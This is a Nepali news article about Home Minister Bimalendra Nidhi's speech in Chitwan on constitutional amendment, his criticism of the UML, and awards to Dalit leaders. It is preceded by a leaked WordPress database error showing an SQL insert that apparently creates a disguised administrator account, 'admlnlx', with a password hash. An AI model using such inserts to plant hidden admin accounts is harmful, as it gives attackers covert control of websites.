WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVXuDrdAQQm/0edc6jj8IWBBg7/W230', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:57:14', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर २१–
उपप्रधान तथा गृहमन्त्री विमलेन्द्र निधीले संविधान संशोधनबाट एमाले पछि हट्न नपाउने जिकिर गर्नुभएको छ ।
दलित संघ चितवनले आयोजना गरेको दुई दिने प्रशिक्षण कार्यक्रमको आज भरतपुरमा उद्घाटन गर्दै मन्त्री निधीले विगतमा संविधान संशोधनका लागि एमालेले पनि हस्ताक्षर गरेको भन्दै अहिले बखेडा झिक्ने काम मात्र गरेको बताउनुभयो । उहाँले संविधान संशोधन बिना संविधान कार्यान्वयन गर्न पनि कठिनाई हुने बताउनुभयो ।
मन्त्री निधीले एमाले अध्यक्ष ओलीले राजनीतिक बैमानी गरेको आरोप समेत लगाउनुभयो । नेता निधीले सबै मातृभाषालाई संविधानमा अनुसुची राख्ने तयारी गर्दा एमालेले भारतको भाषा राखेको भन्दै अफवाह फैलाएकोमा आपत्ति जनाउनुभयो । नेता निधीले नेपाली काँग्रेस जस्तो राष्ट्रवादी पाटी अरु कुनै नरहेको जिकिर गर्दै संविधान संधोनमा सहयोग गर्न सबैमा आह्वान गर्नुभयो । उहाँले संविधान संशोधन अवस्य हुने भन्दै निर्वाचनका लागि सबैलाई तयार रहन आग्रह गर्नुभयो ।
मन्त्री निधीले संविधानमा दलितहरुको अधिकार पूर्णरुपमा होस् भन्ने काँग्रेसको चाहना भन्दै यसैका लागि काँग्रेस लडिरहेको बताउनुभयो ।
यसैबीच सोही अवसरमा दलित अगुवाहरु मिनबहादुर विश्वकर्मा, विष्णुमाया परियार र बीरबहादुर लोहनीलाई सम्मान गरिएको छ । उहाँहरुलाई मन्त्री निधीले सम्मान पत्र प्रदान गर्नुभएको थियो । कार्यक्रम अध्यक्ष मीन विश्वकर्माको अध्यक्षतामा भएको थियो । कार्यक्रममा साँसद शेषनाथ अधिकारी, रामकृष्ण घिमिरे, गीता वाग्ले, विष्णुमाया परियार, काँग्रेस चितवनका सभापति जितनारायण श्रेष्ठ, उपसभापति कैलाश कोइराला, दलित संघ चितवनकी अध्यक्ष शान्ति परियारलगायतको उपस्थिति रहेको थियो । दुई दिने तालिम पुरै महिला केन्द्रीत हुनेछ ।